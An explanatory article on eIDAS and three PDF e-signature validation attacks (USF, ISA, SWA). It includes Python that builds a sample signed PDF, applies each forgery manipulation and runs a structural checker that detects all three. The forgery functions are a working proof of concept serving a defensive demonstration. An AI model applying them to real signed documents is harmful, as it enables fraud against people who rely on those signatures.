
eIDAS and eSignature Validation Attacks: How to Protect Yourself

Ensuring that the integrity of an e-signature remains intact is crucial to protecting the messages or documents attached to it. This article explains three classes of e-signature validation attacks and how they can be avoided by adopting the e-signature standards referenced under eIDAS.

eIDAS, the European Regulation on electronic identification and trust services for electronic transactions (Regulation (EU) No 910/2014), references standards for the signature formats used in Advanced Electronic Signatures and Qualified Electronic Signatures; these standards protect the integrity of the e-signature and of the data it covers.

The Real Danger of E-Signature Attacks

The use of e-signatures continues to gain acceptance around the globe as a solution that helps not only individuals but also businesses and government entities exchange data such as official government documents, medical records, financial information and business contracts. Instead of relying on a hand-written signature, whose authenticity is not always easy to establish, a Qualified Electronic Signature is now an accepted method of validating the identity of the signer/sender of such data; under eIDAS it has the equivalent legal effect of a hand-written signature and is recognised in courts across the EU internal market.

Unfortunately, as cyber-criminals become more adept at discovering vulnerabilities within information systems, they have found ways to launch e-signature validation attacks. Here are three classes of e-signature validation attacks that let an attacker take advantage of weaknesses in the way some validators process a signed PDF.

It is important to note that each attack takes advantage of a missing step in the signature verification process, not of a flaw in signature generation. As noted at the end, if a signature format conforms to the referenced standards, a verification algorithm can be implemented that is immune to all three attacks.

The classification described below is based on a publication by pdf-insecurity.org.

E-Signature Attack #1 – Universal Signature Forgery (USF)

The goal of a Universal Signature Forgery (USF) attack is to disable the e-signature verification process by manipulating the signature object: adding invalid content to it, or removing entries the validator depends on (for instance the /ByteRange or /Contents entry). This object holds all the information that is needed for signature validation.

Even though the signature object still exists within the document, the validation logic is unable to apply the cryptographic operations needed to verify the signature, because the USF manipulation has confused it. If the attack succeeds, a vulnerable validator or viewer does not report an error; its signature panel still displays the e-signature as valid and as belonging to a specific individual or entity.

E-Signature Attack #2 – Incremental Saving Attack (ISA)

In an Incremental Saving Attack (ISA), the goal is to add an incremental update to a signed document that redefines its structure. The target of this attack is the PDF incremental saving (incremental update) feature, which, when used legitimately, allows a user to add annotations to a PDF. These annotations are saved incrementally as a new PDF body appended after the original content. The incremental saving feature is also used for signing the PDF: the signature object is appended to the original file content in exactly the same way.

Normally, any alteration after a document has been signed should trigger a warning that the document has been modified. In an ISA attack, however, the attacker appends additional content, such as new pages or annotations, to an already signed PDF. Strictly speaking this is not an attack on the signature itself but an abuse of the incremental saving feature; the vulnerability lies in validation logic that fails to detect that unsigned content follows the signed byte ranges. The content appended after signing is treated as an ordinary update, as if it came from the entity that originally signed the document. A successful ISA attack results in the new content being displayed while the signature verification process remains unaware that the PDF has been modified.

E-Signature Attack #3 – Signature Wrapping (SWA)

A Signature Wrapping (SWA) attack uses a different approach to bypass a PDF's signature protection without using the incremental saving feature. It does this by moving the second part of the signed /ByteRange to the end of the manipulated document. The attacker then reuses the xref pointer in the signed trailer (the startxref offset) so that it references a manipulated xref placed at that offset. In some instances, the attacker may also wrap the relocated second part in a stream object or dictionary to prevent it from being processed by the viewer's parser.

In a successful SWA attack, the attacker adds malicious unsigned objects to the document. If the relocated second part has been wrapped, these objects can be placed before or after the manipulated xref; without wrapping, they are placed after it. Depending on the PDF viewer, the attacker may also copy the file's last trailer and place it after the manipulated xref so that the file opens normally while signature verification fails to detect the manipulation.
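The following Python is an added example, not code from the original article or from pdf-insecurity.org. It constructs a minimal PDF with a dummy signature dictionary (the /Contents value is a placeholder; no real CMS signature is produced or verified), mimics the three layouts described above (USF: /ByteRange removed; ISA: unsigned incremental update appended; SWA: manipulated xref placed at the offset the signed startxref already points to, injected object and copied trailer in the gap, original second range relocated to the end) and then runs the structural checks a validator needs before it computes any digest: /ByteRange and /Contents must be present, the first range must start at 0 and end exactly at /Contents, the gap between the ranges must hold nothing but the signature hex string, and the second range must end at EOF. The /SubFilter check reflects the PAdES requirement (ETSI EN 319 142-1) for /ETSI.CAdES.detached. Object numbers, the page layout and the PAGE3 replacement object are assumptions made for the sample.

```python
"""Structural checks a PDF signature validator must run before any cryptographic
work. They catch the three attack classes (USF, ISA, SWA) at the layout level.
All sample PDFs are constructed here with a dummy /Contents value; no real CMS
signature is produced or verified."""
import re

BR_PLACEHOLDER = b"/ByteRange [0000000000 0000000000 0000000000 0000000000]"
# Attacker-supplied replacement for the page object (constructed sample data).
PAGE3 = b"3 0 obj\n<< /Type /Page /Parent 2 0 R /MediaBox [0 0 200 100] >>\nendobj\n"


def build_signed_pdf(sig_hex=b"DEADBEEF" * 8):
    """Minimal one-page PDF whose /ByteRange covers everything except the
    /Contents hex string, which is how a conforming signer lays the file out."""
    objs = [
        b"<< /Type /Catalog /Pages 2 0 R /AcroForm << /Fields [4 0 R] /SigFlags 3 >> >>",
        b"<< /Type /Pages /Kids [3 0 R] /Count 1 >>",
        b"<< /Type /Page /Parent 2 0 R /MediaBox [0 0 200 100] /Annots [4 0 R] >>",
        b"<< /Type /Annot /Subtype /Widget /FT /Sig /T (sig1) /Rect [0 0 0 0] /P 3 0 R /V 5 0 R >>",
        b"<< /Type /Sig /Filter /Adobe.PPKLite /SubFilter /ETSI.CAdES.detached "
        + BR_PLACEHOLDER + b" /Contents <" + sig_hex + b"> >>",
    ]
    out, offsets = bytearray(b"%PDF-1.7\n"), []
    for num, obj in enumerate(objs, 1):
        offsets.append(len(out))
        out += b"%d 0 obj\n%s\nendobj\n" % (num, obj)
    xref_off = len(out)
    out += b"xref\n0 %d\n0000000000 65535 f \n" % (len(objs) + 1)
    out += b"".join(b"%010d 00000 n \n" % off for off in offsets)
    out += b"trailer\n<< /Size %d /Root 1 0 R >>\nstartxref\n%d\n%%%%EOF\n" % (len(objs) + 1, xref_off)
    a = out.index(b"/Contents <") + len(b"/Contents ")   # offset of '<'
    b = out.index(b">", a) + 1                             # one past '>'
    i = out.index(BR_PLACEHOLDER)                          # same width, so offsets stay valid
    out[i:i + len(BR_PLACEHOLDER)] = b"/ByteRange [%010d %010d %010d %010d]" % (0, a, b, len(out) - b)
    return bytes(out)


def universal_signature_forgery(pdf):
    """USF: blank out /ByteRange; the signature dictionary survives but is unusable."""
    m = re.search(rb"/ByteRange \[[^\]]*\]", pdf)
    return pdf[:m.start()] + b" " * (m.end() - m.start()) + pdf[m.end():]


def incremental_saving_attack(pdf):
    """ISA: append an unsigned incremental update that replaces the page object."""
    prev = int(re.search(rb"startxref\s+(\d+)", pdf).group(1))
    upd = PAGE3 + b"xref\n0 1\n0000000000 65535 f \n3 1\n%010d 00000 n \n" % len(pdf)
    xref_off = len(pdf) + len(PAGE3)
    upd += b"trailer\n<< /Size 6 /Root 1 0 R /Prev %d >>\nstartxref\n%d\n%%%%EOF\n" % (prev, xref_off)
    return pdf + upd


def signature_wrapping_attack(pdf):
    """SWA: keep the first signed range, put a manipulated xref at the offset the signed
    startxref already points to, inject an object plus a copied trailer, and relocate
    the second signed range to the end. The third /ByteRange value is rewritten; it lies
    inside the first signed range, so a digest would fail too, but the structural check
    rejects the layout before any digest is computed."""
    m = re.search(rb"/ByteRange \[(\d+) (\d+) (\d+) (\d+)\]", pdf)
    a, b, c = (int(m.group(i)) for i in (2, 3, 4))
    part1, contents, part2 = pdf[:a], pdf[a:b], pdf[b:b + c]
    xref = part2[:part2.index(b"trailer")]                 # "...endobj\nxref\n0 6\n" + six 20-byte entries
    e0 = xref.index(b"0000000000 65535 f")                 # entry 0; object 3 is entry 3
    xref = xref[:e0 + 60] + b"%010d 00000 n \n" % (b + len(xref)) + xref[e0 + 80:]
    gap = contents + xref + PAGE3 + part2[len(xref):]      # copied trailer keeps startxref = old xref
    new_br = b"/ByteRange [%010d %010d %010d %010d]" % (0, a, a + len(gap), c)
    return part1[:m.start()] + new_br + part1[m.end():] + gap + part2


def check_signature_structure(pdf):
    """Findings list; empty means the layout is sane and the digest may now be computed
    over pdf[0:a] + pdf[b:b+c] and compared against the CMS blob in /Contents."""
    t = re.search(rb"/Type\s*/Sig\b", pdf)
    if t is None:
        return ["no signature dictionary found"]
    d_start = pdf.rfind(b"<<", 0, t.start())
    sig = pdf[d_start:pdf.find(b">>", t.end()) + 2]
    br = re.search(rb"/ByteRange\s*\[\s*(\d+)\s+(\d+)\s+(\d+)\s+(\d+)\s*\]", sig)
    ct = re.search(rb"/Contents\s*<[0-9A-Fa-f]*>", sig)
    if br is None or ct is None:
        return ["USF: /ByteRange or /Contents missing or malformed; refuse to validate"]
    start, a, b, c = (int(g) for g in br.groups())
    findings = []
    if start != 0 or a != d_start + ct.start() + ct.group(0).index(b"<") or a > b:
        findings.append("ByteRange must start at 0 and stop exactly at the /Contents value")
    if b + c != len(pdf):
        findings.append("ISA: signed range ends at %d but the file has %d bytes" % (b + c, len(pdf)))
    if not re.fullmatch(rb"<[0-9A-Fa-f]*>", pdf[a:b]):
        findings.append("SWA: gap between the signed ranges holds more than the signature value")
    if not re.search(rb"/SubFilter\s*/ETSI\.CAdES\.detached\b", sig):
        findings.append("not PAdES: /SubFilter is not /ETSI.CAdES.detached (ETSI EN 319 142-1)")
    return findings


def run_demo():
    good = build_signed_pdf()
    return {
        "clean": check_signature_structure(good),
        "usf": check_signature_structure(universal_signature_forgery(good)),
        "isa": check_signature_structure(incremental_saving_attack(good)),
        "swa": check_signature_structure(signature_wrapping_attack(good)),
    }


if __name__ == "__main__":
    for name, findings in run_demo().items():
        print(name, "->", findings or ["structure OK, proceed to digest verification"])
```

Only when `check_signature_structure` returns no findings should a validator go on to hash the two ranges and verify the CMS signature; a validator that skips these checks, or that reports "valid" when the cryptographic step cannot even be attempted, is exactly what the three attacks exploit.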

eIDAS Standards Provide Enhanced Protection Against E-Signature Attacks

The standards referenced by eIDAS include requirements that go beyond the minimum requirements for PDF signatures. With these additional requirements, signature verification algorithms can be implemented that thwart attacks which would otherwise go unnoticed by ordinary PDF or online signature verification. eIDAS provides the legal framework for advanced and qualified electronic signatures, adding to the protections available within PDF software, and all EU member states are required to recognise the validity of qualified and advanced electronic signatures that comply with its requirements.

Advanced electronic signatures must meet certain requirements that ensure their authenticity in order to be considered valid. The signature must be uniquely linked to the signatory and capable of identifying the signatory.

The signature must be created using electronic signature creation data that the signatory can, with a high level of confidence, use under their sole control. Additionally, the signature must be linked to the signed data in such a way that any subsequent change to the data is detectable.

A qualified electronic signature is an advanced electronic signature that is created by a qualified electronic signature creation device and is based on a qualified certificate. Such certificates are issued by a qualified trust service provider, which must verify the signer's identity before issuing the certificate, and a qualified signature based on a qualified certificate issued in one member state is recognised as qualified in all other member states.

Whether an attack on signature validation succeeds depends on how the signature was created as well as on how stringent the validation process is. The incremental update mechanism of standard PDF software leaves e-signatures exposed to the attacks above when validators do not check the signed byte ranges against the whole file. These weaknesses can be mitigated by adopting the standards referenced by eIDAS for Advanced or Qualified Electronic Signatures.

 
